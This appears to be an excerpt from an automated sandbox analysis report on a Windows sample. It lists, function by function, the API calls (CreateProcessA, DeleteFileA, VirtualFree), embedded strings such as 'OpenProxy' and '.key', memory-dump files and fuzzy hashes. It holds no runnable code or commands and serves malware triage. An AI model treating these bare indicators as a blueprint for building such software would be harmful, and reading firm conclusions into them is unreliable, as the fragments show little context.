                                APIs
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • _memset.LIBCMT ref: 00734C4F
                                • _memset.LIBCMT ref: 00734CA3
                                • _memset.LIBCMT ref: 00734E27
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$Message$PeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp
                                • API String ID: 3936486738-2429605096
                                • Opcode ID: 4ca4bb7b55acf6b8519e43530e66dc73b1e505b6d55d584264d218ee891f1215
                                • Instruction ID: 2cf8158bb9b6a99be93f75704f10342a9a3aa004703869a0b2878a78c847b1ba
                                • Opcode Fuzzy Hash: 4ca4bb7b55acf6b8519e43530e66dc73b1e505b6d55d584264d218ee891f1215
                                • Instruction Fuzzy Hash: F5B1CBB4A00218DFDB14DF98C885A9DB7B2FF88314F14C559E919AB382D779E981CF90
                                APIs
                                • SendDlgItemMessageA.USER32(?,00000000,?,00000000,00000001), ref: 006FFE40
                                • SendDlgItemMessageA.USER32(55E9FFFF,00000000,?,?,00913664), ref: 006FFE83
                                • SendDlgItemMessageA.USER32(55E9FFFF,00000000,?,00000000,00913664), ref: 006FFEE6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ItemMessageSend
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 3015471070-4102074842
                                • Opcode ID: 0b7339c85165709b0f54b11053b5df1d7fb2168b0eca27c06442d88747dfcb99
                                • Instruction ID: 109661a7e5996dfae7f4398ccbb01313be209b26ef13c036fcfa0dd3029977e6
                                • Opcode Fuzzy Hash: 0b7339c85165709b0f54b11053b5df1d7fb2168b0eca27c06442d88747dfcb99
                                • Instruction Fuzzy Hash: 55B118B0D0022D9BDB18CF95C594BFEB7B2FF48701F208129E215AA3E4D7789A41DB60
                                APIs
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 006E289C
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 006E28AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                • String ID: __atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
                                • API String ID: 3936482309-3498923023
                                • Opcode ID: 4d1bc8237ddc7827af6d7472793719ea1a257cf3678c0e000661dd74eb605f3e
                                • Instruction ID: 37d29de222a72e1862cbc9ed5a14c7654c99ef012db252b6788a88b23126b369
                                • Opcode Fuzzy Hash: 4d1bc8237ddc7827af6d7472793719ea1a257cf3678c0e000661dd74eb605f3e
                                • Instruction Fuzzy Hash: 8451E470B40346AFEB18E769DC13BAFB3D9EB51314F00451DF61ADB3C2DAB0A9008661
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Mpunct
                                • String ID: c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 4240859931-2929274957
                                • Opcode ID: 8453cd062e4603620a65678ade299b4d2d7e1e7a5582c735e108314401268606
                                • Instruction ID: 9f42158069c6a570c8e442bfb6ae5e5f1b13f0ab1e0848fd89d5116d393deeaf
                                • Opcode Fuzzy Hash: 8453cd062e4603620a65678ade299b4d2d7e1e7a5582c735e108314401268606
                                • Instruction Fuzzy Hash: 02511431A81B51AFE734CA2DCC56F96F3A6FB51724F10465DE129A73C1CBB4B8048B91
                                APIs
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 007EE192
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007EE1DC
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007EE1F4
                                  • Part of subcall function 007EE2F0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 007EE31A
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp, xrefs: 007EE174, 007EE1B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Fac_nodeFac_node::_std::_$Message$ObjectPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
                                • API String ID: 1555395783-2040512386
                                • Opcode ID: 5d8072df00bf3b22c157b6c7db88ea05089aa5518459c4dc6cfee37a8c93718c
                                • Instruction ID: 9b4968f71c940b8300b5a63ac704fe93ff2885f97812cbef646a5303f74d93a8
                                • Opcode Fuzzy Hash: 5d8072df00bf3b22c157b6c7db88ea05089aa5518459c4dc6cfee37a8c93718c
                                • Instruction Fuzzy Hash: AB516D71E0050CDFCB08DFE9C891AEEB7B9BF8C310F248219E505AB295DB34A941CB60
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: shared_ptr
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxctrlcontainer.cpp
                                • API String ID: 2025160788-2516480217
                                • Opcode ID: 344632201b45da2da7d1c0065f7d8093897f90d50ec7e3152ea72f1dc448d22b
                                • Instruction ID: 527bc9cf8e2ead2940856055984d51f3bcab68e465a245c6e9e6868a871e51ff
                                • Opcode Fuzzy Hash: 344632201b45da2da7d1c0065f7d8093897f90d50ec7e3152ea72f1dc448d22b
                                • Instruction Fuzzy Hash: EC514070A00209DFEB14DFA4C866BFEB7B5AF88344F204158E515A72C2DB796E40CFA5
                                APIs
                                • IsWindow.USER32(00000000), ref: 006FAD3E
                                Strings
                                • Warning: not executing disabled command %d, xrefs: 006FACF4
                                • Implementation Warning: control notification = $%X., xrefs: 006FADAE
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006FAD0B, 006FAD4D, 006FADC5
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window
                                • String ID: Implementation Warning: control notification = $%X.$Warning: not executing disabled command %d$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 2353593579-426398373
                                • Opcode ID: 49ed8f3ed2930ca3d8010a65972110ac10d8a459ccd229682d96f35e01d5d0c6
                                • Instruction ID: b18ad63266882cd1774f84bd7a8cedca016dec63ffa8dc3d262165118783b934
                                • Opcode Fuzzy Hash: 49ed8f3ed2930ca3d8010a65972110ac10d8a459ccd229682d96f35e01d5d0c6
                                • Instruction Fuzzy Hash: 1B414AB4E0020CAFDB14DAD4C891BBEB7B6AF44301F108169F615AB3D1D6749E82DB52
                                APIs
                                • GetObjectA.GDI32(00000000,00000054,?), ref: 007C11C2
                                  • Part of subcall function 0071C820: _labs.LIBCMTD ref: 0071C829
                                Strings
                                • T, xrefs: 007C11CB
                                • nBytes == sizeof( BITMAP ), xrefs: 007C1273
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h, xrefs: 007C127F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object_labs
                                • String ID: T$f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h$nBytes == sizeof( BITMAP )
                                • API String ID: 2632953047-3411948671
                                • Opcode ID: 10939397d3eedabeec51ff647c19b0af1ccc6873dd4a7d4530894fd41aa83efe
                                • Instruction ID: 66c34e80a409d5dfb65a2a4538d3f5836de32fea0888a0cf9fc546a6bc0bd8a1
                                • Opcode Fuzzy Hash: 10939397d3eedabeec51ff647c19b0af1ccc6873dd4a7d4530894fd41aa83efe
                                • Instruction Fuzzy Hash: 68419278A00308DFDB08CF98C695A9DBBF1BB59304F25815DD809AB392D635EE42CB91
                                APIs
                                  • Part of subcall function 10008210: _malloc.LIBCMT ref: 1000822A
                                • _memmove.LIBCMT ref: 10005E82
                                • _memset.LIBCMT ref: 10005ED6
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10005F03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateProcess_malloc_memmove_memset
                                • String ID: D
                                • API String ID: 3842526209-2746444292
                                • Opcode ID: 850ca5d264fe173b9e3c106157ca87d6f5bf1ee1fd9b6599d7d0f0264aa2ca30
                                • Instruction ID: f0f6d4aada1cf27fd9e14c63a0f0dd41f21f525d9095844cd27369b388f1341c
                                • Opcode Fuzzy Hash: 850ca5d264fe173b9e3c106157ca87d6f5bf1ee1fd9b6599d7d0f0264aa2ca30
                                • Instruction Fuzzy Hash: ED214BB7D001842AF711C664DC09BBF77ACDB867C1F040065FD899B14AEA776B0882E2
                                APIs
                                • IsWindow.USER32(?), ref: 00700C0C
                                • GetDlgItem.USER32(?,?), ref: 00700C35
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • GetParent.USER32(?), ref: 00700CCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ItemParentPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 302436890-4102074842
                                • Opcode ID: fa0fdd696d35ed1cfbeadc5bacfcb9acb3508b89acc9737ef3614d4b85c7c207
                                • Instruction ID: 397a88369955e400d8b573982bbd38b336dad68331bfeb18fdede42d3840e313
                                • Opcode Fuzzy Hash: fa0fdd696d35ed1cfbeadc5bacfcb9acb3508b89acc9737ef3614d4b85c7c207
                                • Instruction Fuzzy Hash: 94313D74640208EFDB04DF64D959FAA73E5BF48321F208358E9199B6C1D778DA81CB90
                                APIs
                                • _memset.LIBCMT ref: 0075ABA6
                                • GetSysColor.USER32(00000014), ref: 0075AC2B
                                • CreateDIBitmap.GDI32(00000000,00000028,00000004,00000001,00000028,00000000), ref: 0075ACCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: BitmapColorCreate_memset
                                • String ID: (
                                • API String ID: 3930187609-3887548279
                                • Opcode ID: 67984998a6460ee8853e480eadaaae22a225f535e0d20fbb6759bf7679e1edf3
                                • Instruction ID: 5784a5a1f3d5d691cb8323c26327dcc9dba18f1691fcc136565f419e1a5dd5e0
                                • Opcode Fuzzy Hash: 67984998a6460ee8853e480eadaaae22a225f535e0d20fbb6759bf7679e1edf3
                                • Instruction Fuzzy Hash: 63313671D152189BEB20CF68CC41BECBBB2EF95301F0481E9D50DAB786DA755A88DF21
                                APIs
                                • _memset.LIBCMT ref: 1000537B
                                  • Part of subcall function 10008210: _malloc.LIBCMT ref: 1000822A
                                • _memmove.LIBCMT ref: 100053B7
                                  • Part of subcall function 10006DF0: FreeLibrary.KERNEL32(?,?,00000000,00000000,?,10006F9B,00000000,?,?,?,10005153,?), ref: 10006E35
                                  • Part of subcall function 10006DF0: _free.LIBCMT ref: 10006E42
                                  • Part of subcall function 10006DF0: VirtualFree.KERNEL32(5BC0335E,00000000,00008000,00000000,00000000,?,10006F9B,00000000,?,?,?,10005153,?), ref: 10006E59
                                  • Part of subcall function 10006DF0: GetProcessHeap.KERNEL32(00000000,10006F9B,00000000,00000000,?,10006F9B,00000000,?,?,?,10005153,?), ref: 10006E62
                                  • Part of subcall function 10006DF0: HeapFree.KERNEL32(00000000,?,10006F9B,00000000,?,?,?,10005153,?), ref: 10006E69
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Free$Heap$LibraryProcessVirtual_free_malloc_memmove_memset
                                • String ID: OpenProxy$Proxy
                                • API String ID: 1490964631-2520863159
                                • Opcode ID: 9be8171ed48ba0fef3e73bce1e05bd6755c636408eed1a5fc9ac15a6e5a54f0d
                                • Instruction ID: 6509336351aa22d785e191dbd958a582c5287dbd3369ab68f83c156e5fdf8394
                                • Opcode Fuzzy Hash: 9be8171ed48ba0fef3e73bce1e05bd6755c636408eed1a5fc9ac15a6e5a54f0d
                                • Instruction Fuzzy Hash: 1D1108799012147BE700FFA4DC82B9F73A8EB14290F108125F9049B285EAB5FB4087E1
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100025FB
                                • DeleteFileA.KERNEL32(?), ref: 10002670
                                  • Part of subcall function 10002440: _memset.LIBCMT ref: 1000246A
                                  • Part of subcall function 10002440: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000247E
                                  • Part of subcall function 10002440: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002510
                                  • Part of subcall function 10002440: GetFileSize.KERNEL32(00000000,00000000), ref: 10002527
                                  • Part of subcall function 10002440: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10002543
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$DirectorySystem$CreateDeleteReadSize_memset
                                • String ID: .key$Default
                                • API String ID: 3518743009-1583214558
                                • Opcode ID: a3840daf9407aec65e7c53cd65277b6320b1d41c7a9cd5a6501ad5228e34cfb6
                                • Instruction ID: 2dc08d9c157279019f491e66d0ccd1eaa1e65a0f2a88edc2c1e85c90165ba429
                                • Opcode Fuzzy Hash: a3840daf9407aec65e7c53cd65277b6320b1d41c7a9cd5a6501ad5228e34cfb6
                                • Instruction Fuzzy Hash: 82117B705045975BEB12CB3888A07DABBE5EF86381F19C0C1D9C89B215EBB29CC9C780
                                APIs
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • SysStringLen.OLEAUT32(006F2B84), ref: 0071F4AB
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0071F4C8
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?), ref: 0071F50F
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp, xrefs: 0071F490, 0071F4E8
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMessageMultiWide$PeekPostQuitString
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp
                                • API String ID: 618925966-1155380592
                                • Opcode ID: 4537a1324097c4230a590ad842ce65c8216d8369c952d8270409e1edd737c269
                                • Instruction ID: ff954b0789534c98c54ead7031ef2b89381b14f26dc4d159b8e6bea6791ec9f8
                                • Opcode Fuzzy Hash: 4537a1324097c4230a590ad842ce65c8216d8369c952d8270409e1edd737c269
                                • Instruction Fuzzy Hash: 8A113375A40308FBDB24EF98CC49F9F77B4AF88750F208154FA09AA1D0D7B4AA81CB55
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ObjectSelect
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h$hBitmap == m_hBitmap$m_hDC != 0
                                • API String ID: 1517587568-835343786
                                • Opcode ID: 88f07978b85fd0339db059120a44316c99dd0c9d2db20a68a5e638e9c3964296
                                • Instruction ID: 469b4ce429674abacf78d9c28338e11aa6cdd5153d7438d28cdda6bf2ffb4862
                                • Opcode Fuzzy Hash: 88f07978b85fd0339db059120a44316c99dd0c9d2db20a68a5e638e9c3964296
                                • Instruction Fuzzy Hash: 8B1181B4A40208AFDB14DB94C985F6D7771EB98324F21419CE608AB382D771ED82CB55
                                APIs
                                Strings
                                • AtlIsValidString( pszFormat ), xrefs: 006D2E5E
                                • c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h, xrefs: 006D2E69
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _vswprintf_s_vwprintf
                                • String ID: AtlIsValidString( pszFormat )$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h
                                • API String ID: 2206667278-1643558047
